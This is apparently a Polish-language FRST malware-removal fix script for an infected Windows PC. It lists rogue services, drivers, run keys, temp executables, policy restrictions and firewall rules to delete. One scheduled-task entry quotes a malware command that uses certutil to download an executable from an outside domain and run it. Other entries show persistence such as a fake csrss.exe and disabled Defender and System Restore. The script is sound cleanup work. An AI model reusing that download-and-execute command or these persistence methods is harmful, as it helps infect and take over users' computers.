CloseProcesses:
CreateRestorePoint:
EmptyTemp:
File: C:\Program Files (x86)\SmartData\performer.exe
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\Run: [PolishedCherry] => C:\WINDOWS\rss\csrss.exe [4537856 2019-01-28] () <==== UWAGA
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\Run: [CloudNet] => C:\Users\mrvit\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-04] (EpicNet Inc.) <==== UWAGA
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\Policies\Explorer: [TaskbarNoNotification] 1
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\MountPoints2: {9f2a5831-2a07-11e9-99fb-ac9e17868d3b} - "J:\SetFH3.exe" 
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\MountPoints2: {a7fb4d2f-0ab9-11e9-9991-ac9e17868d3b} - "H:\SetFH3.exe" 
Startup: C:\Users\mrvit\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uahtdrii.lnk [2019-02-06]
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
GroupPolicy\User: Ograniczenia ? <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{1d4fa830-2139-4597-be95-1b61a6b48023}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{400f1cc0-de6c-48ec-8214-2af832a4ad2b}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{6fbec42c-2c0b-4678-8f3c-cb5715b87940}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8d3586d4-cbe0-4a6a-8fb7-a2e168616594}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8d3586d4-cbe0-4a6a-8fb7-a2e168616594}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{c6368515-286d-434a-b917-35e9e5d7b09b}: [NameServer] 8.8.8.8
BHO: YoutubeAdBlock -> {E81D3BD4-0E3E-4B58-BEC1-F3791DAA11A8} -> C:\Program Files (x86)\eWuDAKEgxIE\t44LQUUnP.dll => Brak pliku
BHO-x32: YoutubeAdBlock -> {E81D3BD4-0E3E-4B58-BEC1-F3791DAA11A8} -> C:\Program Files (x86)\eWuDAKEgxIE\kkvtUqip.dll => Brak pliku
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
R2 EventSvc; C:\ProgramData\Microsoft\Windows\EventSvc\eventsvc.exe [360448 2018-07-24] (CloudBees, Inc.) [Brak podpisu cyfrowego] <==== UWAGA
R2 PowerSvc; C:\ProgramData\Microsoft\Windows\Power\PowerSvc.exe [6406448 2018-06-25] () [Brak podpisu cyfrowego] <==== UWAGA
R2 Smart Monitoring; C:\Program Files (x86)\SmartData\svchost_ms.exe [2204672 2019-01-28] () [Brak podpisu cyfrowego]
S2 SysSvc; C:\Users\mrvit\AppData\Local\NtvHost\syssvc.exe [360448 2019-01-28] (CloudBees, Inc.) [Brak podpisu cyfrowego] <==== UWAGA
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== UWAGA (zerobajtowy plik/folder)
R2 WindowsEvent; C:\ProgramData\WinEvent\WindowsEvent.exe [364032 2019-01-22] () [Brak podpisu cyfrowego]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
S1 halihdhr; \??\C:\Windows\system32\drivers\halihdhr.sys [X]
S1 jkllezcx; \??\C:\Windows\system32\drivers\jkllezcx.sys [X]
2019-02-04 19:30 - 2019-02-04 19:31 - 000000000 ____D C:\ProgramData\R9X7AI53YBFY8SFGXFJJ
2019-01-31 15:04 - 2019-01-31 15:04 - 000000000 ____D C:\ProgramData\ARLJP1RUHLEXXC8JQ10A
2019-01-28 20:18 - 2019-01-28 20:36 - 000000000 ____D C:\Users\mrvit\AppData\Roaming\wjhksfvwjtj
2019-01-28 19:15 - 2019-01-28 19:17 - 005937968 _____ (EnigmaSoft Limited) C:\Users\mrvit\Downloads\sh-remover.exe
2019-01-28 19:15 - 2019-01-28 19:15 - 000000000 ____D C:\ProgramData\eJBlAwaaSdTwMIVBOCtXDXkWQj
2019-01-28 19:14 - 2019-01-28 20:36 - 000000000 ____D C:\Users\mrvit\AppData\Roaming\2a3jlpdtl1r
2019-01-28 19:14 - 2019-01-28 20:20 - 000000000 ____D C:\Users\mrvit\AppData\Roaming\CRMSvc
2019-01-28 18:58 - 2019-01-28 20:36 - 000000000 ____D C:\Windows\SysWOW64\jshcaaky
2019-02-04 16:02 - 2018-12-16 14:00 - 000000266 __RSH C:\ProgramData\ntuser.pol
C:\WINDOWS\rss\csrss.exe
C:\Users\mrvit\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
2019-02-06 09:36 - 2019-02-06 09:36 - 000350208 _____ (Google Ventures) C:\Users\mrvit\AppData\Local\Temp\17D3.tmp.exe
2019-01-31 17:46 - 2019-01-31 17:46 - 000623616 _____ (TODO: <Company name>) C:\Users\mrvit\AppData\Local\Temp\5606.tmp.exe
2019-01-31 13:07 - 2019-01-31 13:07 - 000841216 _____ (TODO: <Nom de la société>) C:\Users\mrvit\AppData\Local\Temp\91E.tmp.exe
2019-02-06 15:00 - 2019-02-06 15:00 - 000493568 _____ () C:\Users\mrvit\AppData\Local\Temp\93BA.tmp.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Bah.exe
2019-01-29 18:27 - 2019-01-29 18:27 - 000438272 _____ () C:\Users\mrvit\AppData\Local\Temp\BB43.tmp.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Bethoven.exe
2019-01-28 20:40 - 2019-01-28 20:33 - 002237968 _____ (Kaspersky Lab ZAO) C:\Users\mrvit\AppData\Local\Temp\CEA8C357-626B-4535-843F-4143CB372398.exe
2019-01-29 14:56 - 2019-01-29 14:56 - 000438272 _____ () C:\Users\mrvit\AppData\Local\Temp\D7CE.tmp.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Mocart.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Paganini.exe
2019-01-29 15:01 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Vivaldi.exe
Task: {06C203A5-06C8-4C37-B89C-AB8E4F9F712F} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\6.1.0\Scheduler.exe
Task: {0E422A81-FA6D-4391-8BBD-3F4DCA5DD7C4} - System32\Tasks\Windows Defender => C:\Users\mrvit\AppData\Roaming\driver\driver.exe
Task: {24A62FBF-CF92-4C87-95C1-B814B345C5F9} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-28] () <==== UWAGA
Task: {927F53F1-F735-48CE-B647-62E2BEF75AEE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://andreysharanov.info/app/app.exe C:\Users\mrvit\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\mrvit\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {BF891601-CF66-4B87-8073-FF4E5089D0D4} - System32\Tasks\Driver Booster SkipUAC (mrvit) => C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DriverBooster.exe
2019-02-06 13:09 - 2019-02-06 13:09 - 001207296 _____ () C:\Users\mrvit\AppData\Local\Temp\is-REDNS.tmp\SetFH3.tmp
2019-02-06 13:09 - 2018-06-09 15:36 - 000009728 _____ () C:\Users\mrvit\AppData\Local\Temp\is-1GP6P.tmp\unarctest.exe
2019-01-28 18:58 - 2019-01-28 20:19 - 002204672 _____ () C:\Program Files (x86)\SmartData\performer.exe
AlternateDataStreams: C:\desktop.ini:CachedTiles [462]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\Bandicam:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\desktop.ini:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\OpenIV:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\Rockstar Games:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [470]
FirewallRules: [{E94BF94A-C950-4A96-AB99-F9A766808393}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DriverBooster.exe Brak pliku
FirewallRules: [{85C2864B-ACDE-4BAA-992D-F0BEAB832656}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DriverBooster.exe Brak pliku
FirewallRules: [{B55CAFF4-421D-4E12-879F-2C2329A0E9BC}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DBDownloader.exe Brak pliku
FirewallRules: [{7721B1F3-0EF8-4628-B503-22E7B0AFD628}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DBDownloader.exe Brak pliku
FirewallRules: [{733F55F9-A0BC-4328-8FBC-B7A6E93A00E4}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\AutoUpdate.exe Brak pliku
FirewallRules: [{1A4DFF03-2C17-493B-926E-8E564EE0F9FC}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\AutoUpdate.exe Brak pliku
FirewallRules: [{B12AF87A-843A-44B3-8479-523B79D40613}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku
FirewallRules: [{4BD287FD-1A8F-4DB3-A341-E22BC9477568}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku
FirewallRules: [TCP Query User{238CD3D3-AEF1-46ED-94BF-7B88144DFD7E}C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe Brak pliku
FirewallRules: [UDP Query User{947016F5-970B-47D5-B647-A3FCF31BA0D4}C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe Brak pliku
FirewallRules: [TCP Query User{872F4C78-485F-4375-B465-90B74B3D3D39}C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe] => (Block) C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe Brak pliku
FirewallRules: [UDP Query User{10DEB734-2962-4620-9E37-09DC88D6FC46}C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe] => (Block) C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe Brak pliku
FirewallRules: [{75D19098-BCA4-452F-BF09-70817B2389F5}] => (Allow) C:\Users\mrvit\OneDrive\Pulpit\Setup\FIFASetup\fifaconfig.exe Brak pliku
FirewallRules: [{3792F067-9364-44DC-A29E-05961937AC38}] => (Allow) C:\Users\mrvit\OneDrive\Pulpit\Setup\FIFASetup\fifaconfig.exe Brak pliku
FirewallRules: [TCP Query User{6134F20D-0CCE-440C-9476-5D60B67A7CBC}C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe Brak pliku
FirewallRules: [UDP Query User{91B73DE9-204D-422D-BFCB-E086618D734A}C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe Brak pliku
FirewallRules: [TCP Query User{434E980A-0BC7-4108-81F1-1D0A060F00C6}C:\program files\java\jre1.8.0_161\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_161\bin\javaw.exe Brak pliku
FirewallRules: [UDP Query User{07C4CA16-8C3F-418E-8242-3CDA65806B6D}C:\program files\java\jre1.8.0_161\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_161\bin\javaw.exe Brak pliku
FirewallRules: [TCP Query User{1E03A2EB-4132-438A-8E4B-CC8B71C4E078}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [UDP Query User{249E0D64-F101-4B33-98BE-F0493B01F844}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [TCP Query User{07DC604E-FB36-4516-A820-31F66C8D9B62}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [UDP Query User{AB001B20-E45E-4907-9660-CC9F38427504}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [{06096381-9327-4DB3-B041-7BEFACF7A63E}] => (Allow) C:\WINDOWS\rss\csrss.exe ()
FirewallRules: [{AF3804AF-BB0B-4F7D-B012-B5EF1A9416A5}] => (Allow) C:\Users\mrvit\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{58671782-9E0A-4238-80FF-395771E120CF}] => (Allow) LPort=3389
RemoveProxy:
CMD: ipconfig /flushdns